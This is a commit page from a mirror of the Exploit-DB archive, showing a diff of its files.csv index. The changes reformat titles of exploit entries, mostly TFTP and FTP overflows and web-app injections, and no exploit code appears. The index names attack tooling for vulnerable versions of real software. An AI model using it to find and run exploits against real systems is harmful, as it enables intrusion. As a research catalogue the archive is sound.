bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 12_09_2014

Browse source
This commit is contained in:
Offensive Security 2014-12-09 04:52:50 +00:00
parent 35d1967763
commit 6a7030ba10
22 changed files with 864 additions and 523 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

118
files.csv
View file

@ -773,7 +773,7 @@ id,file,description,date,author,platform,type,port
952,platforms/windows/remote/952.pl,"MailEnable Enterprise & Professional https Remote BoF Exploit",2005-04-25,CorryL,windows,remote,8080
953,platforms/windows/remote/953.c,"Yager <= 5.24 Remote Buffer Overflow Exploit",2005-04-25,cybertronic,windows,remote,1089
954,platforms/cgi/webapps/954.pl,"E-Cart <= 1.1 (index.cgi) Remote Command Execution Exploit",2005-04-25,z,cgi,webapps,0
955,platforms/windows/remote/955.py,"NetFTPd 4.2.2 User Authentication Remote Buffer Overflow Exploit",2005-04-26,"Sergio Alvarez",windows,remote,21
955,platforms/windows/remote/955.py,"NetFTPd 4.2.2 - User Authentication Remote Buffer Overflow Exploit",2005-04-26,"Sergio Alvarez",windows,remote,21
956,platforms/multiple/dos/956.c,"Ethereal / tcpdump (rsvp_print) Infinite Loop Denial of Service Exploit",2005-04-26,vade79,multiple,dos,0
957,platforms/linux/dos/957.c,"Tcpdump 3.8.x (ldp_print) Infinite Loop Denial of Service Exploit",2005-04-26,vade79,linux,dos,0
958,platforms/linux/dos/958.c,"Tcpdump 3.8.x (rt_routing_info) Infinite Loop Denial of Service Exploit",2005-04-26,vade79,linux,dos,0
@ -836,7 +836,7 @@ id,file,description,date,author,platform,type,port
1024,platforms/windows/dos/1024.html,"MS Internet Explorer - Multiple Stack Overflows Crash",2005-05-31,"Benjamin Franz",windows,dos,0
1025,platforms/windows/dos/1025.html,"MS Internet Explorer - javascript ""window()"" Crash",2005-05-31,"Benjamin Franz",windows,dos,0
1026,platforms/windows/remote/1026.cpp,"e-Post SPA-PRO 4.01 (imap) Remote Buffer Overflow Exploit",2005-06-02,"Jerome Athias",windows,remote,143
1027,platforms/windows/dos/1027.c,"FutureSoft TFTP Server 2000 Remote Denial of Service Exploit",2005-06-02,ATmaCA,windows,dos,0
1027,platforms/windows/dos/1027.c,"FutureSoft TFTP Server 2000 - Remote Denial of Service Exploit",2005-06-02,ATmaCA,windows,dos,0
1028,platforms/windows/remote/1028.c,"Crob FTP Server <= 3.6.1 - Remote Stack Overflow Exploit",2005-06-03,"Leon Juranic",windows,remote,0
1029,platforms/linux/local/1029.c,"ePSXe <= 1.6.0 nogui() Local Exploit",2005-06-04,Qnix,linux,local,0
1030,platforms/php/webapps/1030.pl,"PostNuke <= 0.750 readpmsg.php SQL Injection Exploit",2005-06-05,K-C0d3r,php,webapps,0
@ -888,7 +888,7 @@ id,file,description,date,author,platform,type,port
1078,platforms/php/webapps/1078.pl,"XML-RPC Library <= 1.3.0 (xmlrpc.php) Remote Code Injection Exploit",2005-07-01,ilo--,php,webapps,0
1079,platforms/windows/remote/1079.html,"MS Internet Explorer (javaprxy.dll) COM Object Remote Exploit",2005-07-05,k-otik,windows,remote,0
1080,platforms/php/webapps/1080.pl,"phpBB 2.0.15 (highlight) Database Authentication Details Exploit",2005-07-03,SecureD,php,webapps,0
1081,platforms/hardware/remote/1081.c,"Nokia Affix < 3.2.0 btftp Remote Client Exploit",2005-07-03,"Kevin Finisterre",hardware,remote,0
1081,platforms/hardware/remote/1081.c,"Nokia Affix < 3.2.0 - btftp Remote Client Exploit",2005-07-03,"Kevin Finisterre",hardware,remote,0
1082,platforms/php/webapps/1082.pl,"XOOPS <= 2.0.11 xmlrpc.php SQL Injection Exploit",2005-07-04,RusH,php,webapps,0
1083,platforms/php/webapps/1083.pl,"xmlrpc.php Library <= 1.3.0 - Remote Command Execute Exploit (2)",2005-07-04,dukenn,php,webapps,0
1084,platforms/php/webapps/1084.pl,"xmlrpc.php Library <= 1.3.0 - Remote Command Execute Exploit (3)",2005-07-04,"Mike Rifone",php,webapps,0
@ -1189,7 +1189,7 @@ id,file,description,date,author,platform,type,port
1421,platforms/windows/remote/1421.cpp,"Veritas NetBackup 4/5 Volume Manager Daemon Remote BoF Exploit",2006-01-16,"Patrick Thomassen",windows,remote,13701
1422,platforms/windows/dos/1422.c,"Cerberus FTP Server <= 2.32 Denial of Service Exploit",2006-01-16,pi3ch,windows,dos,0
1423,platforms/windows/dos/1423.html,"MS Internet Explorer <= 6.x (IMG / XML elements) Denial of Service",2006-01-18,"Inge Henriksen",windows,dos,0
1424,platforms/windows/dos/1424.pl,"Tftpd32 2.81 (GET Request) Format String Denial of Service PoC",2006-01-19,"Critical Security",windows,dos,0
1424,platforms/windows/dos/1424.pl,"Tftpd32 2.81 - (GET Request) Format String Denial of Service PoC",2006-01-19,"Critical Security",windows,dos,0
1425,platforms/linux/local/1425.c,"Xmame <= 0.102 (-pb/-lang/-rec) Local Buffer Overflow Exploit",2006-01-21,sj,linux,local,0
1442,platforms/php/webapps/1442.pl,"ezDatabase <= 2.0 (db_id) Remote Command Execution Exploit",2006-01-22,cijfer,php,webapps,0
1445,platforms/linux/local/1445.c,"Eterm LibAST < 0.7 (-X Option) Local Privilege Escalation Exploit",2006-01-24,"Johnny Mast",linux,local,0
@ -2027,7 +2027,7 @@ id,file,description,date,author,platform,type,port
2331,platforms/solaris/local/2331.c,"X11R6 <= 6.4 XKEYBOARD - Local Buffer Overflow Exploit (solaris/x86)",2006-09-08,"RISE Security",solaris,local,0
2332,platforms/sco/local/2332.c,"X11R6 <= 6.4 XKEYBOARD - Local Buffer Overflow Exploit (sco/x86)",2006-09-08,"RISE Security",sco,local,0
2333,platforms/php/webapps/2333.php,"CCleague Pro <= 1.0.1RC1 (Cookie) Remote Code Execution Exploit",2006-09-08,Kacper,php,webapps,0
2334,platforms/windows/dos/2334.py,"Multithreaded TFTP <= 1.1 (Long Get Request) Denial of Service Exploit",2006-09-08,n00b,windows,dos,0
2334,platforms/windows/dos/2334.py,"Multithreaded TFTP <= 1.1 - (Long Get Request) Denial of Service Exploit",2006-09-08,n00b,windows,dos,0
2335,platforms/php/webapps/2335.txt,"MyABraCaDaWeb <= 1.0.3 (base) Remote File Include Vulnerabilities",2006-09-08,ddoshomo,php,webapps,0
2336,platforms/php/webapps/2336.pl,"Socketwiz Bookmarks <= 2.0 (root_dir) Remote File Include Exploit",2006-09-09,Kacper,php,webapps,0
2337,platforms/php/webapps/2337.txt,"Vivvo Article Manager <= 3.2 (id) Remote SQL Injection Vulnerability",2006-09-09,MercilessTurk,php,webapps,0
@ -2530,8 +2530,8 @@ id,file,description,date,author,platform,type,port
2851,platforms/php/webapps/2851.txt,"Hacks List phpBB Mod <= 1.21 Remote SQL Injection Vulnerability",2006-11-26,"the master",php,webapps,0
2852,platforms/php/webapps/2852.txt,"com_flyspray Mambo Com. <= 1.0.1 - Remote File Disclosure Vulnerability",2006-11-26,3l3ctric-Cracker,php,webapps,0
2853,platforms/asp/webapps/2853.txt,"SimpleBlog <= 2.3 (admin/edit.asp) Remote SQL Injection Vulnerability",2006-11-26,bolivar,asp,webapps,0
2854,platforms/windows/dos/2854.py,"AT-TFTP <= 1.9 (Long Filename) Remote Buffer Overflow PoC",2006-11-27,"Liu Qixu",windows,dos,0
2855,platforms/windows/dos/2855.py,"3Com TFTP Service <= 2.0.1 (Long Transporting Mode) Overflow PoC",2006-11-27,"Liu Qixu",windows,dos,0
2854,platforms/windows/dos/2854.py,"AT-TFTP <= 1.9 - (Long Filename) Remote Buffer Overflow PoC",2006-11-27,"Liu Qixu",windows,dos,0
2855,platforms/windows/dos/2855.py,"3Com TFTP Service <= 2.0.1 - (Long Transporting Mode) Overflow PoC",2006-11-27,"Liu Qixu",windows,dos,0
2856,platforms/linux/remote/2856.pm,"ProFTPD 1.3.0 (sreplace) Remote Stack Overflow Exploit (meta)",2006-11-27,"Evgeny Legerov",linux,remote,21
2857,platforms/multiple/dos/2857.php,"PHP <= 4.4.4/5.1.6 htmlentities() Local Buffer Overflow PoC",2006-11-27,"Nick Kezhaya",multiple,dos,0
2858,platforms/linux/remote/2858.c,"Evince Document Viewer (DocumentMedia) Buffer Overflow Exploit",2006-11-28,K-sPecial,linux,remote,0
@ -2541,7 +2541,7 @@ id,file,description,date,author,platform,type,port
2862,platforms/php/webapps/2862.txt,"P-News 2.0 - (user.txt) Remote Password Disclosure Vulnerability",2006-11-28,Lu7k,php,webapps,0
2863,platforms/php/webapps/2863.php,"kubix <= 0.7 - Multiple Vulnerabilities exploit",2006-11-29,BlackHawk,php,webapps,0
2864,platforms/php/webapps/2864.txt,"b2evolution 1.8.5 - 1.9b (import-mt.php) Remote File Include Vulnerability",2006-11-29,tarkus,php,webapps,0
2865,platforms/windows/remote/2865.rb,"3Com TFTP Service <= 2.0.1 (Long Transporting Mode) Overflow Exploit",2006-11-30,cthulhu,windows,remote,69
2865,platforms/windows/remote/2865.rb,"3Com TFTP Service <= 2.0.1 - (Long Transporting Mode) Overflow Exploit",2006-11-30,cthulhu,windows,remote,69
2866,platforms/windows/remote/2866.html,"Acer LunchApp.APlunch (ActiveX Control) Command Execution Exploit",2006-11-30,"Tan Chew Keong",windows,remote,0
2867,platforms/php/webapps/2867.php,"PHPGraphy 0.9.12 Privilege Escalation / Commands Execution Exploit",2006-11-30,rgod,php,webapps,0
2869,platforms/php/webapps/2869.php,"Serendipity <= 1.0.3 (comment.php) Local File Include Exploit",2006-11-30,Kacper,php,webapps,0
@ -2561,7 +2561,7 @@ id,file,description,date,author,platform,type,port
2884,platforms/php/webapps/2884.txt,"awrate.com Message Board 1.0 (search.php) Remote Include Vulnerability",2006-12-02,DeltahackingTEAM,php,webapps,0
2885,platforms/php/webapps/2885.txt,"mxBB Module mx_tinies <= 1.3.0 - Remote File Include Vulnerability",2006-12-02,bd0rk,php,webapps,0
2886,platforms/php/webapps/2886.txt,"PHP Upload Center 2.0 (activate.php) File Include Vulnerabilities",2006-12-03,GregStar,php,webapps,0
2887,platforms/windows/remote/2887.pl,"AT-TFTP <= 1.9 (Long Filename) Remote Buffer Overflow Exploit",2006-12-03,"Jacopo Cervini",windows,remote,69
2887,platforms/windows/remote/2887.pl,"AT-TFTP <= 1.9 - (Long Filename) Remote Buffer Overflow Exploit",2006-12-03,"Jacopo Cervini",windows,remote,69
2888,platforms/php/webapps/2888.php,"Envolution <= 1.1.0 (PNSVlang) Remote Code Execution Exploit",2006-12-03,Kacper,php,webapps,0
2889,platforms/php/webapps/2889.pl,"QuickCart 2.0 (categories.php) Local File Inclusion Exploit",2006-12-03,r0ut3r,php,webapps,0
2890,platforms/php/webapps/2890.txt,"php-revista <= 1.1.2 (adodb) Multiple Remote File Include Vulnerabilities",2006-12-03,"Cold Zero",php,webapps,0
@ -2865,7 +2865,7 @@ id,file,description,date,author,platform,type,port
3194,platforms/asp/webapps/3194.txt,"makit Newsposter Script 3.0 - Remote SQL Injection Vulnerability",2007-01-25,ajann,asp,webapps,0
3195,platforms/asp/webapps/3195.txt,"GPS CMS 1.2 (print.asp) Remote SQL Injection Vulnerability",2007-01-25,ajann,asp,webapps,0
3196,platforms/php/webapps/3196.php,"Aztek Forum 4.0 - Multiple Vulnerabilities Exploit",2007-01-25,DarkFig,php,webapps,0
3197,platforms/asp/webapps/3197.txt,"forum livre 1.0 (SQL Injection / xss) Multiple Vulnerabilities",2007-01-25,ajann,asp,webapps,0
3197,platforms/asp/webapps/3197.txt,"forum livre 1.0 - (SQL Injection / XSS) Multiple Vulnerabilities",2007-01-25,ajann,asp,webapps,0
3198,platforms/php/webapps/3198.txt,"Virtual Path 1.0 (vp/configure.php) Remote File Include Vulnerability",2007-01-25,GoLd_M,php,webapps,0
3200,platforms/osx/dos/3200.rb,"Apple CFNetwork HTTP Response Denial of Service Exploit (rb code)",2007-01-25,MoAB,osx,dos,0
3201,platforms/php/webapps/3201.txt,"MyPHPcommander 2.0 (package.php) Remote File Include Vulnerability",2007-01-26,"Cold Zero",php,webapps,0
@ -2944,7 +2944,7 @@ id,file,description,date,author,platform,type,port
3274,platforms/windows/remote/3274.txt,"MySQL 4.x/5.0 - User-Defined Function Command Execution Exploit (win)",2007-02-06,"Marco Ivaldi",windows,remote,3306
3275,platforms/php/webapps/3275.txt,"LightRO CMS 1.0 (inhalt.php) Remote File Include Vulnerability",2007-02-06,ajann,php,webapps,0
3276,platforms/windows/dos/3276.cpp,"FlashFXP 3.4.0 build 1145 Remote Buffer Overflow DoS Exploit",2007-02-06,Marsu,windows,dos,0
3277,platforms/windows/dos/3277.cpp,"SmartFTP Client 2.0.1002 Remote Heap Overflow DoS Exploit",2007-02-06,Marsu,windows,dos,0
3277,platforms/windows/dos/3277.cpp,"SmartFTP Client 2.0.1002 - Remote Heap Overflow DoS Exploit",2007-02-06,Marsu,windows,dos,0
3278,platforms/php/webapps/3278.txt,"Kisisel Site 2007 (tr) Remote SQL Injection Vulnerability",2007-02-06,cl24zy,php,webapps,0
3279,platforms/windows/remote/3279.html,"Alibaba Alipay (Remove ActiveX) Remote Code Execution Exploit",2007-02-06,cocoruder,windows,remote,0
3280,platforms/php/webapps/3280.txt,"AgerMenu 0.01 (top.inc.php rootdir) Remote File Include Vulnerability",2007-02-07,GoLd_M,php,webapps,0
@ -3053,7 +3053,7 @@ id,file,description,date,author,platform,type,port
3385,platforms/windows/dos/3385.pl,"XM Easy Personal FTP Server 5.30 (ABOR) Format String DoS Exploit",2007-02-28,"Umesh Wanve",windows,dos,0
3386,platforms/osx/local/3386.pl,"McAfee VirusScan for Mac (Virex) <= 7.7 - Local Root Exploit",2007-02-28,"Kevin Finisterre",osx,local,0
3387,platforms/php/webapps/3387.php,"vBulletin <= 3.6.4 (inlinemod.php postids) Remote SQL Injection Exploit",2007-02-28,rgod,php,webapps,0
3388,platforms/windows/remote/3388.pl,"3Com TFTP Service <= 2.0.1 (Long Transporting Mode) Exploit (perl)",2007-02-28,"Umesh Wanve",windows,remote,69
3388,platforms/windows/remote/3388.pl,"3Com TFTP Service <= 2.0.1 - (Long Transporting Mode) Exploit (perl)",2007-02-28,"Umesh Wanve",windows,remote,69
3389,platforms/linux/remote/3389.c,"madwifi <= 0.9.2.1 WPA/RSN IE Remote Kernel Buffer Overflow Exploit",2007-03-01,"Massimiliano Oldani",linux,remote,0
3390,platforms/asp/webapps/3390.txt,"Angel LMS 7.1 (default.asp id) Remote SQL Injection Vulnerability",2007-03-01,"Craig Heffner",asp,webapps,0
3391,platforms/windows/remote/3391.py,"Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow Exploit",2007-03-01,"Trirat Puttaraksa",windows,remote,0
@ -3096,7 +3096,7 @@ id,file,description,date,author,platform,type,port
3429,platforms/windows/local/3429.php,"PHP COM extensions (inconsistent Win32) safe_mode Bypass Exploit",2007-03-07,N/A,windows,local,0
3430,platforms/windows/dos/3430.html,"Adobe Reader plug-in AcroPDF.dll 8.0.0.0 Resource Consumption",2007-03-08,shinnai,windows,dos,0
3431,platforms/windows/local/3431.php,"PHP 4.4.6 crack_opendict() Local Buffer Overflow Exploit PoC",2007-03-08,rgod,windows,local,0
3432,platforms/windows/dos/3432.pl,"TFTPDWIN Server 0.4.2 (UDP) Denial of Service Exploit",2007-03-08,"Umesh Wanve",windows,dos,0
3432,platforms/windows/dos/3432.pl,"TFTPDWIN Server 0.4.2 - (UDP) Denial of Service Exploit",2007-03-08,"Umesh Wanve",windows,dos,0
3433,platforms/windows/dos/3433.html,"Rediff Toolbar ActiveX Control Remote Denial of Service Exploit",2007-03-08,"Umesh Wanve",windows,dos,0
3434,platforms/multiple/dos/3434.c,"Snort 2.6.1.1/2.6.1.2/2.7.0 (fragementation) Remote DoS Exploit",2007-03-08,Antimatt3r,multiple,dos,0
3435,platforms/php/webapps/3435.txt,"netForo! 0.1 (down.php file_to_download) Remote File Disclosure Vuln",2007-03-08,GoLd_M,php,webapps,0
@ -3154,7 +3154,7 @@ id,file,description,date,author,platform,type,port
3490,platforms/php/webapps/3490.txt,"wbblog (xss/sql) Multiple Vulnerabilities",2007-03-15,"Mehmet Ince",php,webapps,0
3491,platforms/bsd/remote/3491.py,"OpenBSD - ICMPv6 Fragment Remote Execution Exploit PoC",2007-03-15,"Core Security",bsd,remote,0
3492,platforms/php/webapps/3492.txt,"WebCalendar 0.9.45 (includedir) Remote File Inclusion Vulnerability",2007-03-15,Drackanz,php,webapps,0
3493,platforms/asp/webapps/3493.txt,"Absolute Image Gallery 2.0 (gallery.asp categoryid) SQL Injection Vuln",2007-03-15,WiLdBoY,asp,webapps,0
3493,platforms/asp/webapps/3493.txt,"Absolute Image Gallery 2.0 - (gallery.asp categoryid) SQL Injection Vuln",2007-03-15,WiLdBoY,asp,webapps,0
3494,platforms/php/webapps/3494.txt,"McGallery 0.5b (download.php) Arbitrary File Download Vulnerability",2007-03-15,Piker,php,webapps,0
3495,platforms/windows/remote/3495.txt,"CA BrightStor ARCserve (msgeng.exe) Remote Stack Overflow Exploit",2007-03-16,"Winny Thomas",windows,remote,6503
3496,platforms/php/webapps/3496.php,"Php-Stats <= 0.1.9.1b (PC-REMOTE-ADDR) SQL Injection Exploit",2007-03-16,rgod,php,webapps,0
@ -3201,7 +3201,7 @@ id,file,description,date,author,platform,type,port
3538,platforms/php/webapps/3538.txt,"php-revista <= 1.1.2 - Multiple Remote SQL Injection Vulnerabilities",2007-03-21,"Cold Zero",php,webapps,0
3539,platforms/php/webapps/3539.txt,"mambo component nfnaddressbook 0.4 - Remote File Inclusion Vulnerability",2007-03-21,"Cold Zero",php,webapps,0
3540,platforms/windows/remote/3540.py,"Mercur Messaging 2005 <= SP4 - IMAP Remote Exploit (egghunter mod)",2007-03-21,muts,windows,remote,143
3541,platforms/windows/remote/3541.pl,"FutureSoft TFTP Server 2000 Remote SEH Overwrite Exploit",2007-03-22,"Umesh Wanve",windows,remote,69
3541,platforms/windows/remote/3541.pl,"FutureSoft TFTP Server 2000 - Remote SEH Overwrite Exploit",2007-03-22,"Umesh Wanve",windows,remote,69
3542,platforms/php/webapps/3542.txt,"ClassWeb 2.0.3 (BASE) Remote File Inclusion Vulnerabilities",2007-03-22,GoLd_M,php,webapps,0
3543,platforms/php/webapps/3543.pl,"PortailPhp 2.0 (idnews) Remote SQL Injection Exploit",2007-03-22,"Mehmet Ince",php,webapps,0
3544,platforms/windows/remote/3544.c,"Microsoft DNS Server - (Dynamic DNS Updates) Remote Exploit",2007-03-22,"Andres Tarasco",windows,remote,0
@ -5193,7 +5193,7 @@ id,file,description,date,author,platform,type,port
5560,platforms/php/webapps/5560.txt,"Musicbox <= 2.3.7 (artistId) Remote SQL Injection Vulnerability",2008-05-07,HaCkeR_EgY,php,webapps,0
5561,platforms/linux/dos/5561.pl,"rdesktop 1.5.0 iso_recv_msg() Integer Underflow Vulnerability PoC",2008-05-08,"Guido Landi",linux,dos,0
5562,platforms/php/webapps/5562.py,"RunCMS <= 1.6.1 (msg_image) SQL Injection Exploit",2008-05-08,The:Paradox,php,webapps,0
5563,platforms/windows/remote/5563.pl,"TFTP Server for Windows 1.4 ST Remote BSS Overflow Exploit",2008-05-08,tixxDZ,windows,remote,69
5563,platforms/windows/remote/5563.pl,"TFTP Server for Windows 1.4 - ST Remote BSS Overflow Exploit",2008-05-08,tixxDZ,windows,remote,69
5564,platforms/asp/webapps/5564.txt,"Shader TV (Beta) Multiple Remote SQL Injection Vulnerabilities",2008-05-08,U238,asp,webapps,0
5565,platforms/php/webapps/5565.pl,"vShare Youtube Clone 2.6 (tid) Remote SQL Injection Vulnerability",2008-05-08,Saime,php,webapps,0
5566,platforms/php/webapps/5566.txt,"SazCart 1.5.1 - Multiple Remote File Inclusion Vulnerabilities",2008-05-08,RoMaNcYxHaCkEr,php,webapps,0
@ -8009,7 +8009,7 @@ id,file,description,date,author,platform,type,port
8501,platforms/php/webapps/8501.txt,"CRE Loaded 6.2 (products_id) SQL Injection Vulnerability",2009-04-21,Player,php,webapps,0
8502,platforms/php/webapps/8502.txt,"pastelcms 0.8.0 (lfi/sql) Multiple Vulnerabilities",2009-04-21,SirGod,php,webapps,0
8503,platforms/php/webapps/8503.txt,"TotalCalendar 2.4 (include) Local File Inclusion Vulnerability",2009-04-21,SirGod,php,webapps,0
8504,platforms/php/webapps/8504.txt,"NotFTP 1.3.1 (newlang) Local File Inclusion Vulnerability",2009-04-21,Kacper,php,webapps,0
8504,platforms/php/webapps/8504.txt,"NotFTP 1.3.1 - (newlang) Local File Inclusion Vulnerability",2009-04-21,Kacper,php,webapps,0
8505,platforms/php/webapps/8505.txt,"Quick.Cms.Lite 0.5 (id) Remote SQL Injection Vulnerability",2009-04-21,Player,php,webapps,0
8506,platforms/php/webapps/8506.txt,"VS PANEL 7.3.6 (Cat_ID) Remote SQL Injection Vulnerability",2009-04-21,Player,php,webapps,0
8507,platforms/windows/dos/8507.py,"Oracle RDBMS 10.2.0.3/11.1.0.6 - TNS Listener PoC",2009-04-21,"Dennis Yurichev",windows,dos,0
@ -8736,7 +8736,7 @@ id,file,description,date,author,platform,type,port
9261,platforms/php/webapps/9261.txt,"xoops celepar module qas (bsql/xss) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0
9262,platforms/php/webapps/9262.txt,"garagesalesjunkie (sql/xss) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0
9263,platforms/php/webapps/9263.txt,"URA 3.0 (cat) remote SQL injection Vulnerability",2009-07-27,"Chip d3 bi0s",php,webapps,0
9264,platforms/linux/dos/9264.py,"stftp <= 1.10 (PWD Response) Remote Stack Overflow PoC",2009-07-27,sqlevil,linux,dos,0
9264,platforms/linux/dos/9264.py,"stftp <= 1.10 - (PWD Response) Remote Stack Overflow PoC",2009-07-27,sqlevil,linux,dos,0
9265,platforms/linux/dos/9265.c,"ISC DHCP dhclient < 3.1.2p1 Remote Buffer Overflow PoC",2009-07-27,"Jon Oberheide",linux,dos,0
9266,platforms/php/webapps/9266.txt,"iwiccle 1.01 (lfi/sql) Multiple Vulnerabilities",2009-07-27,SirGod,php,webapps,0
9267,platforms/php/webapps/9267.txt,"VS PANEL 7.5.5 (Cat_ID) SQL Injection Vulnerability (patched?)",2009-07-27,octopos,php,webapps,0
@ -9243,7 +9243,7 @@ id,file,description,date,author,platform,type,port
9854,platforms/php/webapps/9854.txt,"tftgallery .13 - Directory Traversal exploit",2009-11-02,blake,php,webapps,0
9855,platforms/php/webapps/9855.txt,"Geeklog <= 1.6.0sr2 - Remote File Upload",2009-10-03,JaL0h,php,webapps,0
9856,platforms/asp/webapps/9856.txt,"Snitz Forums 2000 Multiple Cross-Site Scripting Vulnerabilities",2009-10-15,"Andrea Fabrizi",asp,webapps,0
9857,platforms/asp/webapps/9857.txt,"AfterLogic WebMail Pro 4.7.10 xss",2009-10-05,"Sébastien Duquette",asp,webapps,0
9857,platforms/asp/webapps/9857.txt,"AfterLogic WebMail Pro 4.7.10 - XSS",2009-10-05,"Sébastien Duquette",asp,webapps,0
9858,platforms/hardware/remote/9858.txt,"Riorey RIOS Hardcoded Password Vulnerability 4.7.0",2009-10-08,"Marek Kroemeke",hardware,remote,8022
9859,platforms/freebsd/local/9859.c,"FreeBSD 6.4 pipeclose()/knlist_cleardel() race condition exploit",2009-10-08,"Przemyslaw Frasunek",freebsd,local,0
9860,platforms/freebsd/local/9860.c,"FreeBSD 7.2 VFS/devfs race condition exploit",2009-10-08,"Przemyslaw Frasunek",freebsd,local,0
@ -9775,7 +9775,7 @@ id,file,description,date,author,platform,type,port
10535,platforms/php/webapps/10535.txt,"WordPress and Pyrmont 2.x - SQL Injection Vulnerability",2009-12-18,Gamoscu,php,webapps,0
10537,platforms/php/webapps/10537.txt,"gpEasy <= 1.5RC3 Remote FIle Include Exploit",2009-12-18,"cr4wl3r ",php,webapps,0
10540,platforms/asp/webapps/10540.txt,"E-Smartcart Remote SQL Injection Vulnerability",2009-12-18,R3d-D3V!L,asp,webapps,0
10542,platforms/windows/remote/10542.py,"TFTP SERVER Buffer Overflow remote exploit",2009-12-18,Molotov,windows,remote,69
10542,platforms/windows/remote/10542.py,"TFTP Server for Windows 1.4 - Buffer Overflow Remote Exploit (#2)",2009-12-18,Molotov,windows,remote,69
10543,platforms/php/webapps/10543.txt,"Schweizer NISADA Communication CMS SQL Injection Vulnerability",2009-12-18,"Dr.0rYX AND Cr3W-DZ",php,webapps,0
10544,platforms/multiple/local/10544.html,"Mozilla Firefox Location Bar Spoofing Vulnerability",2009-12-18,"Jordi Chancel",multiple,local,0
10545,platforms/php/webapps/10545.txt,"Joomla Component com_jbook Blind SQL-injection",2009-12-18,FL0RiX,php,webapps,0
@ -11370,7 +11370,7 @@ id,file,description,date,author,platform,type,port
12479,platforms/php/webapps/12479.txt,"Joomla DJ-Classifieds Extension com_djclassifieds Upload Vulnerability",2010-05-02,Sid3^effects,php,webapps,0
12480,platforms/windows/remote/12480.txt,"Acritum Femitter Server 1.03 - Multiple Vulnerabilities",2010-05-02,"Zer0 Thunder",windows,remote,0
12481,platforms/php/webapps/12481.txt,"WHMCS Control 2 (announcements.php) SQL Injection",2010-05-02,"Islam DefenDers",php,webapps,0
12482,platforms/windows/dos/12482.py,"TFTPGUI Long Transport Mode Overflow",2010-05-02,"Jeremiah Talamantes",windows,dos,0
12482,platforms/windows/dos/12482.py,"TFTPGUI - Long Transport Mode Overflow",2010-05-02,"Jeremiah Talamantes",windows,dos,0
12484,platforms/php/webapps/12484.txt,"GuppY 4.5.18 - Blind SQL/XPath Injection Vulnerability",2010-05-02,indoushka,php,webapps,0
12485,platforms/php/webapps/12485.txt,"Burning Board Lite 1.0.2 Shell Upload Vulnerability",2010-05-02,indoushka,php,webapps,0
12486,platforms/php/webapps/12486.txt,"Openannuaire Openmairie Annuaire 2.00 (RFI/LFI) Multiple File Include Vulnerability",2010-05-02,"cr4wl3r ",php,webapps,0
@ -11543,7 +11543,7 @@ id,file,description,date,author,platform,type,port
12677,platforms/windows/local/12677.html,"Rumba FTP Client FTPSFtp.dll 4.2.0.0 - OpenSession() Buffer Overflow",2010-05-21,sinn3r,windows,local,0
12679,platforms/windows/webapps/12679.txt,"3Com* iMC (Intelligent Management Center) - Unauthenticated File Retrieval (traversal)",2010-05-21,"Richard Brain",windows,webapps,0
12680,platforms/windows/webapps/12680.txt,"3Com* iMC (Intelligent Management Center) - Various XSS and Information Disclosure Flaws",2010-05-21,"Richard Brain",windows,webapps,0
12683,platforms/windows/dos/12683.pl,"Solarwinds 10.4.0.10 TFTP DoS",2010-05-21,Nullthreat,windows,dos,69
12683,platforms/windows/dos/12683.pl,"Solarwinds 10.4.0.10 - TFTP DoS",2010-05-21,Nullthreat,windows,dos,69
12684,platforms/php/webapps/12684.txt,"ConPresso 4.0.7 - SQL Injection Vulnerability",2010-05-21,Gamoscu,php,webapps,0
12686,platforms/php/webapps/12686.txt,"Online University (Auth Bypass) SQL Injection Vulnerability",2010-05-21,"cr4wl3r ",php,webapps,0
12687,platforms/windows/dos/12687.pl,"WinDirectAudio 1.0 - (.WAV) PoC",2010-05-21,ahwak2000,windows,dos,0
@ -13970,7 +13970,7 @@ id,file,description,date,author,platform,type,port
16182,platforms/linux/dos/16182.txt,"PHP 5.3.5 grapheme_extract() NULL Pointer Dereference",2011-02-17,"Maksymilian Arciemowicz",linux,dos,0
16183,platforms/php/webapps/16183.txt,"GAzie 5.10 (Login parameter) Multiple Vulnerabilities",2011-02-17,LiquidWorm,php,webapps,0
16190,platforms/windows/dos/16190.pl,"IBM Lotus Domino LDAP Bind Request Remote Code Execution Vulnerability",2011-02-18,"Francis Provencher",windows,dos,0
16191,platforms/windows/dos/16191.pl,"Novell ZenWorks 10 & 11 TFTPD Remote Code Execution Vulnerability",2011-02-18,"Francis Provencher",windows,dos,0
16191,platforms/windows/dos/16191.pl,"Novell ZenWorks 10 & 11 - TFTPD Remote Code Execution Vulnerability",2011-02-18,"Francis Provencher",windows,dos,0
16192,platforms/linux/dos/16192.pl,"Novell Iprint LPD Remote Code Execution Vulnerability",2011-02-18,"Francis Provencher",linux,dos,0
16193,platforms/windows/dos/16193.pl,"Avira AntiVir QUA file - (avcenter.exe) Local Crash PoC",2011-02-19,KedAns-Dz,windows,dos,0
16196,platforms/php/webapps/16196.txt,"eventum issue tracking system 2.3.1 - Stored XSS",2011-02-19,"Saif El-Sherei",php,webapps,0
@ -14111,10 +14111,10 @@ id,file,description,date,author,platform,type,port
16341,platforms/windows/remote/16341.rb,"Oracle 8i TNS Listener SERVICE_NAME Buffer Overflow",2010-11-24,metasploit,windows,remote,0
16342,platforms/windows/remote/16342.rb,"Oracle 10gR2 TNS Listener AUTH_SESSKEY Buffer Overflow",2010-11-24,metasploit,windows,remote,0
16343,platforms/windows/remote/16343.rb,"Oracle Secure Backup NDMP_CONNECT_CLIENT_AUTH Buffer Overflow",2010-05-09,metasploit,windows,remote,0
16344,platforms/windows/remote/16344.rb,"FutureSoft TFTP Server 2000 Transfer-Mode Overflow",2010-05-09,metasploit,windows,remote,0
16345,platforms/windows/remote/16345.rb,"D-Link TFTP 1.0 Long Filename Buffer Overflow",2010-05-09,metasploit,windows,remote,0
16344,platforms/windows/remote/16344.rb,"FutureSoft TFTP Server 2000 - Transfer-Mode Overflow",2010-05-09,metasploit,windows,remote,0
16345,platforms/windows/remote/16345.rb,"D-Link TFTP 1.0 - Long Filename Buffer Overflow",2010-05-09,metasploit,windows,remote,0
16346,platforms/windows/remote/16346.rb,"TFTPDWIN 0.4.2 - Long Filename Buffer Overflow",2010-04-30,metasploit,windows,remote,0
16347,platforms/windows/remote/16347.rb,"3CTftpSvc TFTP Long Mode Buffer Overflow",2010-05-09,metasploit,windows,remote,0
